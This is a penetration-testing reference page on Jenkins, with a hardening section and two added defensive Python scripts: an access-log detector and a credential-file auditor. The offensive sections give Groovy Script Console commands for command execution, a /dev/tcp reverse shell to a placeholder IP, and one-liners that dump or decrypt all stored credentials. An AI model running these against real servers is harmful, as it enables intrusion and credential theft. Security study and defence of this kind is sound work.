Jenkins
aka Hudson
CI/CD automation server on 8080. The Groovy Script Console is direct RCE, build steps run commands, and the secrets directory plus credentials.xml store recoverable credentials.
Ports
| Port | Proto | Notes |
|---|---|---|
| 8080 | tcp | Jenkins web UI |
| 50000 | tcp | agent (JNLP) port |
Fingerprint
- X-Jenkins response header reveals the version
- Login page or, on misconfig, an open dashboard
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /var/lib/jenkins/secrets/ | master.key and hudson.util.Secret to decrypt stored creds | sensitive |
| credentials.xml | encrypted service credentials | sensitive |
| jobs/<job>/config.xml | build steps and sometimes inline secrets | sensitive |
Default / weak creds
admin; some instances leave the Script Console open
Service users
jenkins (or SYSTEM on Windows controllers)
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2024-23897 | Arbitrary file read via the CLI (pre-auth in many configs) |
| CVE-2018-1000861 | Unauthenticated RCE via the Stapler/Groovy chain |
Exploitation primitives
- Manage Jenkins -> Script Console: Groovy 'cmd'.execute() runs as the Jenkins user (often SYSTEM)
- Add a shell build step to a job for execution
- Decrypt credentials.xml using secrets/master.key + hudson.util.Secret
Overview
Jenkins on 8080 automates builds, which means it is built to run code. The Script Console is the fastest path, and even read-only access plus the secrets directory recovers stored credentials.
Script Console RCE
Run a command (Manage Jenkins → Script Console):
```groovy
println "id".execute().text
```
Reverse shell (Groovy):
```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<YOUR_IP>/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
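Because the Script Console and the CLI endpoint are the two paths this page leans on, they are also the two places a defender should be watching. The following is an added example, not code from the page or from the Jenkins project: it parses NCSA combined access-log lines (the format the built-in winstone access logger can be configured to write) and alerts on script-console requests and on bursts of rejected `/cli` requests. The sample log lines are constructed, and the assumption that the third field carries the authenticated Jenkins user (or `-` for anonymous) should be checked against your own logger configuration.

```python
import re
from collections import Counter

# One NCSA "combined" access-log line, as Jenkins's built-in (winstone) access
# logger writes when enabled. The third field is assumed to be the authenticated
# user, or "-" for anonymous; verify this against your logger configuration.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoints whose use should be rare and always attributable to an administrator:
# the controller Script Console (old and /manage/ URL forms, interactive and
# scriptText), per-agent script consoles, and the CLI endpoint.
WATCHLIST = [
    ("script_console", re.compile(r'^/(manage/)?script(Text)?(/|\?|$)')),
    ("agent_script_console", re.compile(r'^/computer/[^/]+/script(Text)?(/|\?|$)')),
    ("cli_endpoint", re.compile(r'^/cli(/|\?|$)')),
]


def parse_line(line):
    """Return a dict of fields for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Map a request path to a watch-list label, or None for ordinary traffic."""
    for label, rx in WATCHLIST:
        if rx.match(path):
            return label
    return None


def detect(lines, allowed_admins=frozenset(), cli_failure_threshold=3):
    """Alert on script-console traffic and on bursts of rejected CLI requests.

    Every script-console hit is at least 'medium' (admins use it legitimately,
    but each use deserves an audit trail). A hit by anonymous or by a user not
    in allowed_admins is 'critical' when the server answered 200, because that
    means the console is reachable without proper authorization, and 'high'
    otherwise. Repeated 4xx answers to /cli from one source are flagged as probing.
    """
    alerts = []
    cli_failures = Counter()
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        label = classify(rec["path"])
        if label is None:
            continue
        if label == "cli_endpoint":
            if 400 <= rec["status"] < 500:
                cli_failures[rec["ip"]] += 1
            continue
        if rec["user"] != "-" and rec["user"] in allowed_admins:
            severity = "medium"
        elif rec["status"] == 200:
            severity = "critical"
        else:
            severity = "high"
        alerts.append({"rule": label, "severity": severity, "ip": rec["ip"],
                       "user": rec["user"], "method": rec["method"], "path": rec["path"]})
    for ip, count in cli_failures.items():
        if count >= cli_failure_threshold:
            alerts.append({"rule": "cli_probe", "severity": "high", "ip": ip, "count": count})
    return alerts


# Constructed sample log: an admin using the console normally, then an anonymous
# source reaching scriptText and hammering /cli. Not captured from a real controller.
SAMPLE_LOG = [
    '10.0.0.5 - alice [12/Mar/2024:09:00:01 +0000] "GET /job/build-api/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - alice [12/Mar/2024:09:01:10 +0000] "GET /manage/script HTTP/1.1" 200 3090 "-" "Mozilla/5.0"',
    '10.0.0.5 - alice [12/Mar/2024:09:01:25 +0000] "POST /script HTTP/1.1" 200 3200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2024:09:05:00 +0000] "POST /scriptText HTTP/1.1" 200 48 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Mar/2024:09:06:00 +0000] "POST /cli HTTP/1.1" 403 0 "-" "Java/17"',
    '203.0.113.9 - - [12/Mar/2024:09:06:01 +0000] "POST /cli HTTP/1.1" 403 0 "-" "Java/17"',
    '203.0.113.9 - - [12/Mar/2024:09:06:02 +0000] "POST /cli HTTP/1.1" 403 0 "-" "Java/17"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG, allowed_admins={"alice"}):
        print(alert)
```

On the sample, the two hits by `alice` come back as `medium`, the anonymous `scriptText` hit with a 200 response is `critical` (the console answered an unauthenticated request), and the three 403s against `/cli` from one address collapse into a single `cli_probe` alert. Feed it the real access log and a set of known administrators; anything above `medium` should page someone.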
Decrypt stored credentials
From the Script Console, dump every stored credential in cleartext:
```groovy
com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{ println(it.id + " : " + it.getPassword()) }
```
Decrypt a single {AQAAABAA...} blob from a job config:
```groovy
println(hudson.util.Secret.decrypt("{AQAAABAAAAA...}"))
```
Offline, with the files looted from secrets/ + credentials.xml:
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xml
```
Hardening
Require authentication on every endpoint, restrict the Script Console to administrators (or disable it), run controllers as a low-privilege service account rather than root or SYSTEM, and patch the CLI file-read CVE (CVE-2024-23897).
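The key-files table above is also a checklist for the defender: the `secrets/` material and `credentials.xml` must not be readable by anyone but the service user, and job `config.xml` files should not carry secrets inline, encrypted or not, because anyone who can read the job config and the key material recovers them. The following added example (not code from the page or from Jenkins) audits a JENKINS_HOME for exactly those conditions: overly permissive modes on the sensitive files and secret material embedded in job configs. It builds a constructed, throw-away JENKINS_HOME layout to run against; the `{AQAAABAA...}` prefix it matches is the encoded header of a `hudson.util.Secret` blob as already shown on this page, and the plaintext-secret regex is a deliberately crude heuristic.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Encrypted hudson.util.Secret blob as stored in XML: "{" + base64 + "}", where the
# base64 of the version/IV-length header decodes to the fixed prefix "AQAAABAA".
ENCRYPTED_BLOB_RE = re.compile(r"\{AQAAABAA[A-Za-z0-9+/=]{8,}\}")
# Heuristic for secrets typed straight into build steps. Values that are shell
# variable references ($VAR) are skipped, since those are the correct pattern.
PLAINTEXT_SECRET_RE = re.compile(
    r"(?i)\b(password|passwd|token|api[_-]?key|secret)\s*[=:]\s*(?!\$)\S+")

# Files from the key-files table that must be readable by the service user only.
SENSITIVE_FILES = ["secrets/master.key", "secrets/hudson.util.Secret", "credentials.xml"]
IS_POSIX = os.name == "posix"  # mode-bit checks are only meaningful on POSIX


def check_permissions(path):
    """Return a description of the problem if the file is group- or world-accessible."""
    mode = stat.S_IMODE(path.stat().st_mode)
    if mode & 0o077:
        return f"mode {mode:04o} is group/world accessible; expected 0600"
    return None


def audit_jenkins_home(root):
    """Walk a JENKINS_HOME and return a list of findings (dicts with path/issue/severity)."""
    root = Path(root)
    findings = []
    for rel in SENSITIVE_FILES:
        p = root / rel
        if not p.exists() or not IS_POSIX:
            continue
        problem = check_permissions(p)
        if problem:
            findings.append({"path": rel, "issue": problem, "severity": "high"})
    for cfg in sorted(root.glob("jobs/*/config.xml")):
        rel = cfg.relative_to(root).as_posix()
        text = cfg.read_text(encoding="utf-8", errors="replace")
        n_encrypted = len(ENCRYPTED_BLOB_RE.findall(text))
        if n_encrypted:
            findings.append({"path": rel, "severity": "medium",
                             "issue": f"{n_encrypted} inline encrypted secret(s) in job config; "
                                      "move them to the credentials store"})
        for m in PLAINTEXT_SECRET_RE.finditer(text):
            findings.append({"path": rel, "severity": "high",
                             "issue": f"possible plaintext secret in build step ({m.group(1)}=...)"})
    return findings


def build_demo_home():
    """Create a constructed JENKINS_HOME in a temp dir (not a real installation) for the demo."""
    root = Path(tempfile.mkdtemp(prefix="jenkins_home_demo_"))
    (root / "secrets").mkdir()
    (root / "secrets" / "master.key").write_text("constructed-master-key\n")
    (root / "secrets" / "hudson.util.Secret").write_bytes(b"\x00" * 32)
    (root / "credentials.xml").write_text(
        "<com.cloudbees.plugins.credentials.SystemCredentialsProvider.ProviderImpl/>\n")
    os.chmod(root / "secrets" / "master.key", 0o600)          # correct
    os.chmod(root / "secrets" / "hudson.util.Secret", 0o644)  # too open: should be flagged
    os.chmod(root / "credentials.xml", 0o600)                 # correct
    job_ok = root / "jobs" / "build-api"
    job_ok.mkdir(parents=True)
    (job_ok / "config.xml").write_text(
        "<project><builders><hudson.tasks.Shell><command>make test</command>"
        "</hudson.tasks.Shell></builders></project>\n")
    job_bad = root / "jobs" / "deploy-prod"
    job_bad.mkdir(parents=True)
    (job_bad / "config.xml").write_text(
        "<project><builders><hudson.tasks.Shell><command>"
        "export API_KEY=$API_KEY\n"                       # variable reference: fine
        "./deploy --user svc --password=Winter2024!\n"    # constructed plaintext secret
        "</command></hudson.tasks.Shell></builders>"
        "<password>{AQAAABAAAAAwY29uc3RydWN0ZWRfZm9yX2RlbW9fb25seQ==}</password>"
        "</project>\n")
    return root


if __name__ == "__main__":
    home = os.environ.get("JENKINS_HOME") or build_demo_home()
    for f in audit_jenkins_home(home):
        print(f"[{f['severity']}] {f['path']}: {f['issue']}")
```

Against the constructed layout it reports the world-readable `hudson.util.Secret`, the inline encrypted blob in `deploy-prod`, and the `--password=` argument in the same job, while leaving `build-api` and the `$API_KEY` reference alone. Pointing `JENKINS_HOME` at a real controller runs the same checks there; findings at `high` are the ones that let read-only filesystem access turn into recovered credentials.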